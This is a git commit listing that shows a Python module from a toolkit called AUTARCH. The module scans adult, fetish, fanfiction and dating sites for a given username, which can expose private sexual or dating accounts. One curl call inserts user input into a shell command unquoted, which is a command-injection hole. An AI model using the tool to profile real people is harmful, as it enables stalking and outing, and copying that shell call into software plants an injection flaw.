Autarch Will Control The Internet

This commit is contained in:
DigiJ
2026-03-13 15:17:15 -07:00
commit 4d3570781e
401 changed files with 484494 additions and 0 deletions

1
modules/__init__.py Normal file
View File

@@ -0,0 +1 @@
# AUTARCH Modules

1594
modules/ad_audit.py Normal file

File diff suppressed because it is too large Load Diff

847
modules/adultscan.py Normal file
View File

@@ -0,0 +1,847 @@
"""
AUTARCH Adult Site Scanner Module
Username OSINT for adult-oriented platforms
Searches usernames across adult content sites, fanfiction platforms,
and related communities.
"""
import json
import re
import shlex
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
from urllib.parse import quote
# Module metadata
DESCRIPTION = "Adult site username OSINT scanner"
AUTHOR = "darkHal"
VERSION = "1.3"
CATEGORY = "osint"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen, display_banner
from core.config import get_config
# Custom sites storage file
from core.paths import get_app_dir as _app_dir
CUSTOM_SITES_FILE = _app_dir() / "custom_adultsites.json"
# Bulk import file
BULK_IMPORT_FILE = _app_dir() / "custom_sites.inf"
# Common username URL patterns for auto-detection
# Candidate profile-URL path templates used by pattern auto-detection.
# '{}' is replaced with the username being probed; ordered roughly by how
# common each convention is across sites, so likely matches are found early.
COMMON_PATTERNS = [
'/user/{}',
'/users/{}',
'/u/{}',
'/profile/{}',
'/profiles/{}',
'/member/{}',
'/members/{}',
'/@{}',
'/{}',
'/people/{}',
'/account/{}',
'/id/{}',
'/{}/profile',
'/user/{}/profile',
'/channel/{}',
'/c/{}',
'/p/{}',
]
class AdultScanner:
"""Username scanner for adult-oriented sites."""
# Default site definitions: (name, url_template, method)
# method: 'status' = check HTTP status, 'content' = check page content
# ('content' sites return 200 even for missing users, so a hit there is
# only reported as 'possible' by check_site).
DEFAULT_SITES = {
# Fanfiction & Story Sites
'fanfiction': [
('Archive of Our Own', 'https://archiveofourown.org/users/{}/profile', 'status'),
('FanFiction.net', 'https://www.fanfiction.net/u/0/{}', 'content'),
('FimFiction', 'https://www.fimfiction.net/user/{}', 'status'),
('Wattpad', 'https://www.wattpad.com/user/{}', 'status'),
('Literotica', 'https://www.literotica.com/stories/memberpage.php?uid=0&username={}', 'content'),
('Adult-FanFiction', 'http://members.adult-fanfiction.org/profile.php?no=0&uname={}', 'content'),
('Hentai Foundry', 'https://www.hentai-foundry.com/user/{}/profile', 'status'),
('SoFurry', 'https://www.sofurry.com/browse/user/{}', 'status'),
('Inkbunny', 'https://inkbunny.net/{}', 'status'),
],
# Art & Creative
'art': [
('DeviantArt', 'https://www.deviantart.com/{}', 'status'),
('Fur Affinity', 'https://www.furaffinity.net/user/{}/', 'status'),
('Newgrounds', 'https://{}.newgrounds.com', 'status'),
('Pixiv', 'https://www.pixiv.net/en/users/{}', 'content'),
('Rule34', 'https://rule34.xxx/index.php?page=account&s=profile&uname={}', 'content'),
('e621', 'https://e621.net/users?name={}', 'content'),
('Derpibooru', 'https://derpibooru.org/profiles/{}', 'status'),
('Twitter/X', 'https://twitter.com/{}', 'status'),
('Tumblr', 'https://{}.tumblr.com', 'status'),
('Pillowfort', 'https://www.pillowfort.social/{}', 'status'),
],
# Video & Streaming
'video': [
('Pornhub', 'https://www.pornhub.com/users/{}', 'status'),
('XVideos', 'https://www.xvideos.com/profiles/{}', 'status'),
('xHamster', 'https://xhamster.com/users/{}', 'status'),
('Chaturbate', 'https://chaturbate.com/{}/', 'status'),
('OnlyFans', 'https://onlyfans.com/{}', 'status'),
('Fansly', 'https://fansly.com/{}', 'status'),
('ManyVids', 'https://www.manyvids.com/Profile/0/{}/', 'content'),
('PocketStars', 'https://pocketstars.com/{}', 'status'),
],
# Forums & Communities
'forums': [
('Reddit', 'https://www.reddit.com/user/{}', 'status'),
('F-List', 'https://www.f-list.net/c/{}', 'status'),
('FetLife', 'https://fetlife.com/users/{}', 'content'),
('Kink.com', 'https://www.kink.com/model/{}', 'content'),
('BDSMLR', 'https://{}.bdsmlr.com', 'status'),
('CollarSpace', 'https://www.collarspace.com/view/{}', 'content'),
],
# Dating & Social
'dating': [
('AdultFriendFinder', 'https://adultfriendfinder.com/p/{}', 'content'),
('Ashley Madison', 'https://www.ashleymadison.com/{}', 'content'),
('Grindr', 'https://www.grindr.com/{}', 'content'),
('Scruff', 'https://www.scruff.com/{}', 'content'),
('Recon', 'https://www.recon.com/{}', 'content'),
],
# Gaming Related (with adult content)
'gaming': [
('F95zone', 'https://f95zone.to/members/?username={}', 'content'),
('LoversLab', 'https://www.loverslab.com/profile/?name={}', 'content'),
('ULMF', 'https://ulmf.org/member.php?username={}', 'content'),
('Nutaku', 'https://www.nutaku.net/user/{}/', 'content'),
],
}
def __init__(self):
    """Initialise scanner state, pull OSINT settings, and build the site table."""
    self.results = []
    self.config = get_config()
    settings = self.config.get_osint_settings()
    self.timeout = settings['timeout']
    self.max_threads = settings['max_threads']
    # Work on per-instance copies so the class-level defaults stay
    # untouched, then append user-defined sites loaded from disk.
    self.sites = {category: list(entries) for category, entries in self.DEFAULT_SITES.items()}
    self.sites['custom'] = []
    self.load_custom_sites()
def load_custom_sites(self):
    """Load user-defined sites from CUSTOM_SITES_FILE into self.sites['custom'].

    Entries are stored on disk as JSON lists and converted back to the
    internal (name, url_template, method) tuple form. A missing file is a
    no-op; a corrupt or unreadable file resets the custom list instead of
    crashing the interactive UI.
    """
    if not CUSTOM_SITES_FILE.exists():
        return
    try:
        with open(CUSTOM_SITES_FILE, 'r') as f:
            data = json.load(f)
        self.sites['custom'] = [tuple(site) for site in data.get('sites', [])]
    except (OSError, ValueError, TypeError):
        # ValueError covers json.JSONDecodeError; TypeError covers a
        # malformed 'sites' payload. Fall back to an empty list.
        self.sites['custom'] = []
def save_custom_sites(self):
    """Persist self.sites['custom'] to CUSTOM_SITES_FILE as JSON.

    Returns:
        bool: True on success, False if the file could not be written or
        the site list could not be serialised.
    """
    try:
        data = {'sites': [list(site) for site in self.sites['custom']]}
        with open(CUSTOM_SITES_FILE, 'w') as f:
            json.dump(data, f, indent=2)
        return True
    except (OSError, TypeError):
        return False
def add_custom_site(self):
"""Interactively add a custom site.

Prompts for a display name, a URL pattern (with '*' marking where the
username goes) and a detection method, then appends the entry to
self.sites['custom'] and persists it via save_custom_sites().
"""
print(f"\n{Colors.BOLD}Add Custom Site{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
print(f"{Colors.CYAN}URL Pattern Format:{Colors.RESET}")
print(f" Use {Colors.YELLOW}*{Colors.RESET} where the username should go")
print(f" Example: {Colors.DIM}https://example.com/user/*{Colors.RESET}")
print(f" Example: {Colors.DIM}https://example.com/profile?name=*{Colors.RESET}")
print(f" Example: {Colors.DIM}https://example.com/profile?name=*{Colors.RESET}")
print()
# Get site name
name = input(f"{Colors.WHITE}Site name: {Colors.RESET}").strip()
if not name:
self.print_status("Cancelled - no name provided", "warning")
return
# Get URL pattern
url_pattern = input(f"{Colors.WHITE}URL pattern (use * for username): {Colors.RESET}").strip()
if not url_pattern:
self.print_status("Cancelled - no URL provided", "warning")
return
if '*' not in url_pattern:
self.print_status("URL must contain * for username placeholder", "error")
return
# Convert * to {} for internal format
# ('*' is the user-facing placeholder; '{}' is what str.format consumes)
url_template = url_pattern.replace('*', '{}')
# Ensure URL has protocol (https is assumed when none given)
if not url_template.startswith('http://') and not url_template.startswith('https://'):
url_template = 'https://' + url_template
# Get detection method
print()
print(f"{Colors.CYAN}Detection Method:{Colors.RESET}")
print(f" {Colors.GREEN}[1]{Colors.RESET} Status code (default) - Check HTTP response code")
print(f" {Colors.GREEN}[2]{Colors.RESET} Content - For sites with custom 404 pages")
method_choice = input(f"{Colors.WHITE}Select [1]: {Colors.RESET}").strip() or "1"
method = 'content' if method_choice == '2' else 'status'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
# Save to file
if self.save_custom_sites():
self.print_status(f"Added '{name}' to custom sites", "success")
print(f"{Colors.DIM} URL: {url_template.replace('{}', '<username>')}{Colors.RESET}")
else:
self.print_status("Failed to save custom sites", "error")
def manage_custom_sites(self):
"""View and manage custom sites.

Loops until the user backs out ('0'); offers add/remove actions and
lists each custom entry with its URL pattern and detection method.
"""
while True:
clear_screen()
display_banner()
print(f"{Colors.BOLD}Manage Custom Sites{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
custom = self.sites.get('custom', [])
if not custom:
print(f"{Colors.YELLOW}No custom sites added yet.{Colors.RESET}")
print()
print(f" {Colors.GREEN}[1]{Colors.RESET} Add New Site")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip()
if choice == "1":
self.add_custom_site()
else:
break
else:
print(f"{Colors.CYAN}Custom Sites ({len(custom)}):{Colors.RESET}")
print()
# 1-indexed so the numbers line up with remove_custom_site's prompt.
for i, (name, url, method) in enumerate(custom, 1):
display_url = url.replace('{}', '*')
method_tag = f"[{method}]"
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {name:25} {Colors.DIM}{method_tag}{Colors.RESET}")
print(f" {Colors.DIM}{display_url}{Colors.RESET}")
print()
print(f" {Colors.GREEN}[A]{Colors.RESET} Add New Site")
print(f" {Colors.RED}[R]{Colors.RESET} Remove Site")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
choice = input(f"{Colors.WHITE}Select: {Colors.RESET}").strip().upper()
if choice == "0":
break
elif choice == "A":
self.add_custom_site()
elif choice == "R":
self.remove_custom_site()
def remove_custom_site(self):
    """Prompt for a 1-based index and delete that entry from the custom list."""
    entries = self.sites.get('custom', [])
    if not entries:
        self.print_status("No custom sites to remove", "warning")
        return
    print()
    raw = input(f"{Colors.WHITE}Enter site number to remove: {Colors.RESET}").strip()
    try:
        position = int(raw) - 1
    except ValueError:
        self.print_status("Invalid number", "error")
    else:
        if not 0 <= position < len(entries):
            self.print_status("Invalid selection", "error")
        else:
            removed = entries.pop(position)
            if self.save_custom_sites():
                self.print_status(f"Removed '{removed[0]}'", "success")
            else:
                self.print_status("Failed to save changes", "error")
    input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def auto_detect_site(self):
"""Auto-detect URL pattern for a domain.

Asks for a bare domain plus a username known to exist there, tries
every template in COMMON_PATTERNS against it, then lets the user pick
one of the patterns that answered 200/301/302 to save as a custom site.
"""
print(f"\n{Colors.BOLD}Auto-Detect Site Pattern{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
print(f"{Colors.CYAN}Enter just the domain name and we'll find the pattern.{Colors.RESET}")
print(f"{Colors.DIM}Example: example.com or www.example.com{Colors.RESET}")
print()
# Get domain
domain = input(f"{Colors.WHITE}Domain: {Colors.RESET}").strip()
if not domain:
self.print_status("Cancelled - no domain provided", "warning")
return
# Clean up domain (strip scheme and trailing slash)
domain = domain.replace('https://', '').replace('http://', '').rstrip('/')
# Get test username
print()
print(f"{Colors.CYAN}We need a known username to test patterns.{Colors.RESET}")
print(f"{Colors.DIM}Enter a username that you know EXISTS on this site.{Colors.RESET}")
test_user = input(f"{Colors.WHITE}Test username: {Colors.RESET}").strip()
if not test_user:
self.print_status("Cancelled - no test username provided", "warning")
return
print(f"\n{Colors.CYAN}Testing {len(COMMON_PATTERNS)} common URL patterns...{Colors.RESET}\n")
# Test each pattern
working_patterns = []
for i, pattern in enumerate(COMMON_PATTERNS):
url = f"https://{domain}{pattern}".format(test_user)
print(f"\r{Colors.DIM} Testing pattern {i+1}/{len(COMMON_PATTERNS)}: {pattern}{' ' * 20}{Colors.RESET}", end="")
# NOTE(review): url is interpolated into a shell string; a domain or
# username containing a single quote could break out of the quoting —
# consider shlex.quote here (as probe_domain/check_site do).
cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time 5 '{url}' 2>/dev/null"
success, output, _ = self.run_cmd(cmd, 7)
if success:
status_code = output.strip()
if status_code in ['200', '301', '302']:
working_patterns.append((pattern, status_code, url))
print(f"\r{' ' * 80}\r", end="") # Clear line
if not working_patterns:
print(f"{Colors.YELLOW}No working patterns found.{Colors.RESET}")
print(f"{Colors.DIM}The site may use a non-standard URL format.{Colors.RESET}")
print(f"{Colors.DIM}Try using manual add [A] with the correct URL pattern.{Colors.RESET}")
return
# Display working patterns
print(f"{Colors.GREEN}Found {len(working_patterns)} working pattern(s):{Colors.RESET}\n")
for i, (pattern, status, url) in enumerate(working_patterns, 1):
status_info = "OK" if status == '200' else f"redirect ({status})"
print(f" {Colors.GREEN}[{i}]{Colors.RESET} {pattern:20} {Colors.DIM}({status_info}){Colors.RESET}")
print(f" {Colors.DIM}{url}{Colors.RESET}")
print()
# Let user select
print(f" {Colors.DIM}[0]{Colors.RESET} Cancel")
print()
choice = input(f"{Colors.WHITE}Select pattern to add: {Colors.RESET}").strip()
try:
idx = int(choice) - 1
if 0 <= idx < len(working_patterns):
selected_pattern, status, _ = working_patterns[idx]
url_template = f"https://{domain}{selected_pattern}"
# Get site name (default: first label of the domain, title-cased)
default_name = domain.split('.')[0].title()
name = input(f"{Colors.WHITE}Site name [{default_name}]: {Colors.RESET}").strip() or default_name
# Determine method based on status: a clean 200 is trusted,
# a redirect needs content-style (uncertain) checking.
method = 'status' if status == '200' else 'content'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
if self.save_custom_sites():
self.print_status(f"Added '{name}' to custom sites", "success")
print(f"{Colors.DIM} Pattern: {url_template.replace('{}', '*')}{Colors.RESET}")
else:
self.print_status("Failed to save custom sites", "error")
elif choice != "0":
self.print_status("Cancelled", "warning")
except ValueError:
if choice != "0":
self.print_status("Invalid selection", "error")
def probe_domain(self, domain: str, test_user: str, quiet: bool = False) -> list:
    """Probe a domain for working URL patterns.

    Args:
        domain: Host to test (any scheme prefix is stripped).
        test_user: Username substituted into each COMMON_PATTERNS template.
        quiet: Suppress progress output and stop at the first working
            pattern (used by bulk import).

    Returns:
        List of (pattern, status_code, url) tuples that answered 200/301/302.
    """
    domain = domain.replace('https://', '').replace('http://', '').rstrip('/')
    working_patterns = []
    for i, pattern in enumerate(COMMON_PATTERNS):
        url = f"https://{domain}{pattern}".format(test_user)
        if not quiet:
            print(f"\r{Colors.DIM} Testing {domain}: pattern {i+1}/{len(COMMON_PATTERNS)}{' ' * 20}{Colors.RESET}", end="")
        # Security fix: shlex.quote keeps quotes/metacharacters in the
        # user-supplied domain or username from escaping the shell string.
        cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time 5 {shlex.quote(url)} 2>/dev/null"
        success, output, _ = self.run_cmd(cmd, 7)
        if success:
            status_code = output.strip()
            if status_code in ['200', '301', '302']:
                working_patterns.append((pattern, status_code, url))
                # For bulk mode, take first working pattern and stop
                if quiet:
                    break
    if not quiet:
        print(f"\r{' ' * 80}\r", end="")
    return working_patterns
def bulk_import(self):
"""Bulk import sites from custom_sites.inf file.

Reads one domain per line from BULK_IMPORT_FILE (creating a commented
template if the file is missing), skips domains already present in the
custom list, probes each new one with probe_domain(quiet=True), and
saves every domain for which a working pattern was found.
"""
print(f"\n{Colors.BOLD}Bulk Import Sites{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
print()
# Check if file exists, create template if not
if not BULK_IMPORT_FILE.exists():
print(f"{Colors.YELLOW}Bulk import file not found.{Colors.RESET}")
print(f"{Colors.DIM}Creating template at: {BULK_IMPORT_FILE}{Colors.RESET}")
print()
create = input(f"{Colors.WHITE}Create template file? (y/n): {Colors.RESET}").strip().lower()
if create == 'y':
template = """# AUTARCH Adult Site Scanner - Bulk Import File
# Add one domain per line (without http:// or https://)
# Lines starting with # are comments
#
# Example:
# example.com
# another-site.net
# subdomain.site.org
#
# After adding domains, run Bulk Import [B] again
# and provide a test username that exists on these sites.
"""
with open(BULK_IMPORT_FILE, 'w') as f:
f.write(template)
self.print_status(f"Created {BULK_IMPORT_FILE}", "success")
print(f"{Colors.DIM}Edit this file and add domains, then run Bulk Import again.{Colors.RESET}")
return
# Read domains from file
domains = []
with open(BULK_IMPORT_FILE, 'r') as f:
for line in f:
line = line.strip()
# Skip empty lines and comments
if line and not line.startswith('#'):
# Clean up domain (strip scheme and trailing slash)
domain = line.replace('https://', '').replace('http://', '').rstrip('/')
if domain:
domains.append(domain)
if not domains:
print(f"{Colors.YELLOW}No domains found in {BULK_IMPORT_FILE.name}{Colors.RESET}")
print(f"{Colors.DIM}Add domains (one per line) and try again.{Colors.RESET}")
return
print(f"{Colors.CYAN}Found {len(domains)} domain(s) in {BULK_IMPORT_FILE.name}:{Colors.RESET}")
for d in domains[:10]:
print(f" {Colors.DIM}-{Colors.RESET} {d}")
if len(domains) > 10:
print(f" {Colors.DIM}... and {len(domains) - 10} more{Colors.RESET}")
print()
# Check which domains are already added (compare by URL host)
existing_domains = set()
for name, url, method in self.sites.get('custom', []):
# Extract domain from URL template
try:
from urllib.parse import urlparse
parsed = urlparse(url.replace('{}', 'test'))
existing_domains.add(parsed.netloc.lower())
# NOTE(review): bare except silently skips malformed templates;
# narrowing to ValueError would be safer.
except:
pass
new_domains = [d for d in domains if d.lower() not in existing_domains]
skipped = len(domains) - len(new_domains)
if skipped > 0:
print(f"{Colors.YELLOW}Skipping {skipped} already-added domain(s){Colors.RESET}")
if not new_domains:
print(f"{Colors.GREEN}All domains already added!{Colors.RESET}")
return
print(f"{Colors.CYAN}Will scan {len(new_domains)} new domain(s){Colors.RESET}")
print()
# Get test username
print(f"{Colors.CYAN}We need a test username to probe URL patterns.{Colors.RESET}")
print(f"{Colors.DIM}Use a common username that likely exists on most sites.{Colors.RESET}")
print(f"{Colors.DIM}Example: admin, test, user, john, etc.{Colors.RESET}")
print()
test_user = input(f"{Colors.WHITE}Test username: {Colors.RESET}").strip()
if not test_user:
self.print_status("Cancelled - no test username provided", "warning")
return
print(f"\n{Colors.CYAN}Scanning {len(new_domains)} domains...{Colors.RESET}\n")
# Scan each domain
added = 0
failed = []
for i, domain in enumerate(new_domains):
print(f"{Colors.DIM}[{i+1}/{len(new_domains)}] Scanning {domain}...{Colors.RESET}")
# Use quiet mode to get first working pattern
patterns = self.probe_domain(domain, test_user, quiet=True)
if patterns:
pattern, status, url = patterns[0]
url_template = f"https://{domain}{pattern}"
name = domain.split('.')[0].title()
method = 'status' if status == '200' else 'content'
# Add to custom sites
new_site = (name, url_template, method)
self.sites['custom'].append(new_site)
added += 1
print(f" {Colors.GREEN}[+]{Colors.RESET} Added {name}: {pattern}")
else:
failed.append(domain)
print(f" {Colors.RED}[X]{Colors.RESET} No pattern found")
# Save results
if added > 0:
if self.save_custom_sites():
print(f"\n{Colors.GREEN}Successfully added {added} site(s){Colors.RESET}")
else:
print(f"\n{Colors.RED}Failed to save custom sites{Colors.RESET}")
if failed:
print(f"\n{Colors.YELLOW}Failed to detect patterns for {len(failed)} domain(s):{Colors.RESET}")
for d in failed[:5]:
print(f" {Colors.DIM}-{Colors.RESET} {d}")
if len(failed) > 5:
print(f" {Colors.DIM}... and {len(failed) - 5} more{Colors.RESET}")
print(f"{Colors.DIM}Try adding these manually with [A] or [D]{Colors.RESET}")
# Offer to clear the import file
print()
clear_file = input(f"{Colors.WHITE}Clear import file? (y/n): {Colors.RESET}").strip().lower()
if clear_file == 'y':
# Keep the header comments
header = """# AUTARCH Adult Site Scanner - Bulk Import File
# Add one domain per line (without http:// or https://)
# Lines starting with # are comments
"""
with open(BULK_IMPORT_FILE, 'w') as f:
f.write(header)
self.print_status("Import file cleared", "success")
def print_status(self, message: str, status: str = "info"):
    """Print a colour-coded status line prefixed with a bracketed symbol."""
    palette = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
    marks = {"info": "*", "success": "+", "warning": "!", "error": "X"}
    color = palette.get(status, Colors.WHITE)
    mark = marks.get(status, '*')
    print(f"{color}[{mark}] {message}{Colors.RESET}")
def run_cmd(self, cmd: str, timeout: int = 10) -> tuple:
    """Run a shell command and return (ok, stdout, stderr), output stripped.

    ok is True only for a zero exit status; a timeout yields
    (False, "", "timeout") and any other failure (False, "", str(error)).
    """
    try:
        proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False, "", "timeout"
    except Exception as exc:
        return False, "", str(exc)
    return proc.returncode == 0, proc.stdout.strip(), proc.stderr.strip()
def check_site(self, site_info: tuple, username: str) -> dict:
    """Check whether a username exists on a single site.

    Args:
        site_info: (name, url_template, method) tuple. method is 'status'
            (trust the HTTP code) or 'content' (sites with custom 404
            pages, where a 200 is only reported as 'possible').
        username: Username to probe.

    Returns:
        Dict with keys 'site', 'url', 'found' (bool) and 'status'.
    """
    name, url_template, method = site_info
    # Templates normally embed '{}'; fall back to simple concatenation.
    if '{}' in url_template:
        url = url_template.format(username)
    else:
        url = url_template + username
    result = {
        'site': name,
        'url': url,
        'found': False,
        'status': 'unknown'
    }
    # HEAD request via curl. Security fix: shlex.quote keeps a hostile
    # username from injecting shell metacharacters into the command line.
    cmd = f"curl -sI -o /dev/null -w '%{{http_code}}' -L --max-time {self.timeout} {shlex.quote(url)} 2>/dev/null"
    success, output, _ = self.run_cmd(cmd, self.timeout + 2)
    if not success:
        result['status'] = 'error'
        return result
    status_code = output.strip()
    if method == 'status':
        # Check HTTP status code
        if status_code == '200':
            result['found'] = True
            result['status'] = 'found'
        elif status_code in ['301', '302']:
            result['found'] = True
            result['status'] = 'redirect'
        elif status_code == '404':
            result['status'] = 'not_found'
        else:
            result['status'] = f'http_{status_code}'
    else:
        # Content-mode sites would need a body fetch for certainty, so a
        # 200 is reported only as a 'possible' hit.
        if status_code == '200':
            result['found'] = True
            result['status'] = 'possible'
        elif status_code == '404':
            result['status'] = 'not_found'
        else:
            result['status'] = f'http_{status_code}'
    return result
def scan_username(self, username: str, categories: list = None):
"""Scan username across selected site categories.

Args:
    username: Username to look up.
    categories: Category keys to include; None means every category.

Returns:
    List of per-site result dicts (also stored on self.results).
"""
if categories is None:
categories = list(self.sites.keys())
# Collect all sites to scan
sites_to_scan = []
for cat in categories:
if cat in self.sites:
sites_to_scan.extend(self.sites[cat])
print(f"\n{Colors.CYAN}Scanning {len(sites_to_scan)} sites for username: {username}{Colors.RESET}")
print(f"{Colors.DIM}This may take a few minutes...{Colors.RESET}\n")
self.results = []
found_count = 0
# Use thread pool for parallel scanning; results arrive (and are
# appended) in completion order, not submission order.
with ThreadPoolExecutor(max_workers=self.max_threads) as executor:
futures = {executor.submit(self.check_site, site, username): site for site in sites_to_scan}
for i, future in enumerate(as_completed(futures)):
result = future.result()
self.results.append(result)
# Display progress: hits get their own line, misses only update
# the in-place progress counter.
if result['found']:
found_count += 1
status_color = Colors.GREEN if result['status'] == 'found' else Colors.YELLOW
print(f" {status_color}[+]{Colors.RESET} {result['site']:25} {result['url']}")
else:
# Show progress indicator
print(f"\r{Colors.DIM} Checked {i+1}/{len(sites_to_scan)} sites, found {found_count}...{Colors.RESET}", end="")
print(f"\r{' ' * 60}\r", end="") # Clear progress line
return self.results
def display_results(self):
    """Print a summary of the last scan: found profiles, then totals.

    Reads self.results as populated by scan_username().
    """
    # (Removed an unused 'not_found' local from the original.)
    found = [r for r in self.results if r['found']]
    print(f"\n{Colors.BOLD}{'' * 60}{Colors.RESET}")
    print(f"{Colors.BOLD}Scan Results{Colors.RESET}")
    print(f"{Colors.BOLD}{'' * 60}{Colors.RESET}\n")
    if found:
        print(f"{Colors.GREEN}Found ({len(found)} sites):{Colors.RESET}\n")
        for r in found:
            # Annotate anything that wasn't a clean 'found' (e.g. redirect/possible).
            status_note = f" ({r['status']})" if r['status'] not in ['found'] else ""
            print(f" {Colors.GREEN}+{Colors.RESET} {r['site']:25} {r['url']}{Colors.DIM}{status_note}{Colors.RESET}")
    else:
        print(f"{Colors.YELLOW}No profiles found.{Colors.RESET}")
    print(f"\n{Colors.DIM}Total sites checked: {len(self.results)}{Colors.RESET}")
    print(f"{Colors.DIM}Profiles found: {len(found)}{Colors.RESET}")
def export_results(self, filename: str):
    """Write the profiles found in the last scan to a plain-text report.

    Args:
        filename: Path of the report file to create/overwrite.
    """
    found = [r for r in self.results if r['found']]
    with open(filename, 'w') as f:
        f.write(f"Username OSINT Results\n")
        f.write(f"{'=' * 50}\n\n")
        f.write(f"Found Profiles ({len(found)}):\n\n")
        for r in found:
            f.write(f"{r['site']}: {r['url']}\n")
    # Bug fix: the original printed the literal placeholder "(unknown)"
    # instead of the actual output path.
    self.print_status(f"Results exported to {filename}", "success")
def show_menu(self):
"""Display main menu.

Clears the screen, shows the banner and database counts, then lists
the scan categories (1-9) and site-management actions (A/D/B/M/L).
"""
clear_screen()
display_banner()
print(f"{Colors.GREEN}{Colors.BOLD} Adult Site Scanner{Colors.RESET}")
print(f"{Colors.DIM} Username OSINT for adult platforms{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
print()
# Show category counts
total = sum(len(sites) for sites in self.sites.values())
custom_count = len(self.sites.get('custom', []))
print(f"{Colors.DIM} Sites in database: {total} ({custom_count} custom){Colors.RESET}")
print()
print(f" {Colors.CYAN}Scan Categories:{Colors.RESET}")
print(f" {Colors.GREEN}[1]{Colors.RESET} Full Scan (all categories)")
print(f" {Colors.GREEN}[2]{Colors.RESET} Fanfiction & Story Sites")
print(f" {Colors.GREEN}[3]{Colors.RESET} Art & Creative Sites")
print(f" {Colors.GREEN}[4]{Colors.RESET} Video & Streaming Sites")
print(f" {Colors.GREEN}[5]{Colors.RESET} Forums & Communities")
print(f" {Colors.GREEN}[6]{Colors.RESET} Dating & Social Sites")
print(f" {Colors.GREEN}[7]{Colors.RESET} Gaming Related Sites")
print(f" {Colors.GREEN}[8]{Colors.RESET} Custom Sites Only")
print(f" {Colors.GREEN}[9]{Colors.RESET} Custom Category Selection")
print()
print(f" {Colors.CYAN}Site Management:{Colors.RESET}")
print(f" {Colors.GREEN}[A]{Colors.RESET} Add Custom Site (manual)")
print(f" {Colors.GREEN}[D]{Colors.RESET} Auto-Detect Site Pattern")
print(f" {Colors.GREEN}[B]{Colors.RESET} Bulk Import from File")
print(f" {Colors.GREEN}[M]{Colors.RESET} Manage Custom Sites")
print(f" {Colors.GREEN}[L]{Colors.RESET} List All Sites")
print()
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
def select_categories(self) -> list:
    """Prompt for a comma-separated list of category numbers.

    Returns:
        List of selected category names, or None if nothing valid was
        chosen (callers treat None as "cancel").
    """
    print(f"\n{Colors.BOLD}Select Categories (comma-separated):{Colors.RESET}")
    print()
    cat_list = list(self.sites.keys())
    for i, cat in enumerate(cat_list, 1):
        count = len(self.sites[cat])
        print(f" [{i}] {cat.title():20} ({count} sites)")
    print()
    selection = input(f"{Colors.WHITE}Enter numbers (e.g., 1,2,3): {Colors.RESET}").strip()
    selected = []
    try:
        for num in selection.split(','):
            idx = int(num.strip()) - 1
            if 0 <= idx < len(cat_list):
                selected.append(cat_list[idx])
    except ValueError:
        # Was a bare 'except: pass'. Non-numeric input aborts parsing but
        # keeps whatever valid selections came before the bad token.
        pass
    return selected if selected else None
def list_sites(self):
    """Show every site in the database, grouped by category."""
    clear_screen()
    display_banner()
    print(f"{Colors.BOLD}Site Database{Colors.RESET}")
    print(f"{Colors.DIM}{'' * 60}{Colors.RESET}\n")
    for category, sites in self.sites.items():
        if not sites:
            continue
        # Custom entries are highlighted and shown with their URL pattern.
        header_color = Colors.YELLOW if category == 'custom' else Colors.GREEN
        print(f"{header_color}{category.upper()} ({len(sites)} sites){Colors.RESET}")
        for name, url, method in sites:
            if category != 'custom':
                print(f" {Colors.DIM}-{Colors.RESET} {name}")
            else:
                display_url = url.replace('{}', '*')
                print(f" {Colors.DIM}-{Colors.RESET} {name} {Colors.DIM}({display_url}){Colors.RESET}")
        print()
    input(f"{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
def run_scan(self, categories: list = None):
    """Ask for a username, scan it, show results, and optionally export."""
    username = input(f"\n{Colors.WHITE}Enter username to search: {Colors.RESET}").strip()
    if not username:
        return
    self.scan_username(username, categories)
    self.display_results()
    # Offer a plain-text export of the hits.
    answer = input(f"\n{Colors.WHITE}Export results to file? (y/n): {Colors.RESET}").strip().lower()
    if answer == 'y':
        self.export_results(f"{username}_adultscan.txt")
def run(self):
"""Main loop.

Shows the menu and dispatches on the user's choice until '0' (back)
or Ctrl-C/EOF. Management actions pause with their own "Press Enter"
prompt and 'continue' past the shared pause at the bottom.
"""
while True:
self.show_menu()
try:
choice = input(f"{Colors.WHITE} Select: {Colors.RESET}").strip().upper()
if choice == "0":
break
elif choice == "1":
self.run_scan() # All categories
elif choice == "2":
self.run_scan(['fanfiction'])
elif choice == "3":
self.run_scan(['art'])
elif choice == "4":
self.run_scan(['video'])
elif choice == "5":
self.run_scan(['forums'])
elif choice == "6":
self.run_scan(['dating'])
elif choice == "7":
self.run_scan(['gaming'])
elif choice == "8":
if self.sites.get('custom'):
self.run_scan(['custom'])
else:
self.print_status("No custom sites added yet. Use [A] to add sites.", "warning")
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "9":
cats = self.select_categories()
if cats:
self.run_scan(cats)
elif choice == "A":
self.add_custom_site()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "D":
self.auto_detect_site()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "B":
self.bulk_import()
input(f"\n{Colors.WHITE}Press Enter to continue...{Colors.RESET}")
continue
elif choice == "M":
self.manage_custom_sites()
continue
elif choice == "L":
self.list_sites()
continue
